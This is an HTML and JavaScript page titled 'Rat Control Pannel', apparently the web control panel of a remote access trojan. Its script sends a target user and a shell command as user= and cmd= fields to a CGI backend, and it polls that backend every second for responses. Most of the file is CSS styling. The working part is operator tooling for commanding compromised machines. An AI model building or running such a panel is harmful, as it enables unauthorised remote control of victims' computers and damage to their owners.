<!doctype html>
<head>
<meta charset='utf-8'>
<title>Rat Control Pannel</title>
<style type="text/css">
* {
	margin: 0;
	padding: 0;
	box-sizing: border-box;
}
body {
	font-family: 'Source Sans Pro', 'メイリオ', 'Hiragino Kaku Gothic Pro', sans-serif;
	font-size: 15px;
}
#header {
	width: 100%;
	height: 15vh;
	min-height: 60px;
	background-color: #52617a;
}
.header_title {
	width: 30%;
	padding: 8px 20px;
	font-size: 1.2rem;
	text-align: center;
	color: #ffffff;
	background-color: transparent;
	border-radius: 8px;
	border: solid 1px #aac3ed;
	text-shadow: 1px 1px 3px #f7b740;
}
#header, #content, #content_box {
	overflow: hidden;
}
#content {
	width: 100%;
	height: 85vh;
	min-height: 450px;
	background-color: #262d3a;
}
#content_box {
	width: 80%;
	height: 80%;
	padding: 0 10%;
	flex-direction: column;
	background-color: #4a4b59;
	border-radius: 20px;
	border: solid 1px #0c1cff;
	list-style-type: none;
}
#content_box li {
	width: 100%;
}
#content_box p {
	margin-top: 50px;
	font-size: 1rem;
	text-align: center;
	color: #ffffff;
	background-color: #352c38;
	padding: 10px 20px;
	border: solid 1px #3e68d1;
}
.content_center {
	display: flex;
	justify-content: center;
	align-items: center;
}
.form_text {
	width: 50%;
	padding: 10px 20px;
	margin-right: 5%;
	color: #ffffff;
	background-color: #3b3c4f;
	border: solid 1px #0c1cff;
	font-size: 1.3rem;
	transition: all 0.5s ease;
}
.form_text:focus {
	background-color: #0e4caf;
}
.form_button {
	width: 45%;
	color: #ffffff;
	font-size: 1.2rem;
	text-align: center;
	padding: 15px 0;
	text-shadow: 1px 1px 3px #dbddff;
	background-color: #4b4e75;
	border-radius: 5px;
	border: solid 1px #5059ce;
	transition: all 0.3s ease;
}
.form_button:hover {
	background-color: #313b4c;
}
@media screen and (max-width: 768px) {
	.header_title {
		font-size: 0.9rem;
	}
	#content_box {
		width: 95%;
		height: 95%;
		padding: 0 3%;
	}
	.form_text, .form_button {
		font-size: 1rem;
		display: block;
		width: 100%;
	}
	.form_text {
		margin-bottom: 50px;
	}
}
</style>
<script type="text/javascript">
document.addEventListener('DOMContentLoaded', function() {

	var txtbox = document.querySelector('.form_text');
	var resp = document.getElementsByTagName('p');
	get_data('all');
	
	document.querySelector('.form_button').addEventListener('click', function() {
		let data_list = []
		let cmd = txtbox.value.split(' ');
		data_list.push(cmd[0]);
		cmd.shift();
		data_list.push(cmd.join(' '));
		if(data_list[1] == '') data_list.pop();
		post_data(data_list);
	});

	function post_data(data) {
		let xhr = new XMLHttpRequest();
		with(xhr) {
			open('POST', '../index.cgi', true);
			setRequestHeader("Content-type", "application/x-www-form-urlencoded");
			onreadystatechange = function() {
				if(readyState == 4 && status == 200) {
					txtbox.value = '';
					resp[1].innerHTML = responseText;
				}
			}
			if(data.length == 1)
				send('other=' + data[0]);
			else if(data.length == 2)
				send('user=' + data[0] + '&' + 'cmd=' + data[1]);
		}
	}

	function get_data(data) {
		let xhr = new XMLHttpRequest();
		setInterval(() => {
			with(xhr) {
				open('POST', '../index.cgi', true);
				setRequestHeader("Content-type", "application/x-www-form-urlencoded");
				onreadystatechange = function() {
					if(readyState == 4 && status == 200) {
						if(responseText != "[]\n") resp[1].innerHTML = responseText;
					}
				}
				send('s_conf=' + data);
			}
		}, 1000);
	}
});
</script>
</head>
<body>
<div id="header" class="content_center"><p class="header_title">Rat Control</p></div>
<div id="content" class="content_center">
	<ul id="content_box" class="content_center">
		<li><input type="text" name="cmd_txtbox" class="form_text"><input type="button" value="send" class="form_button"><li>
		<li><p></p></li>
	</ul>
</div>
</body>
</html>
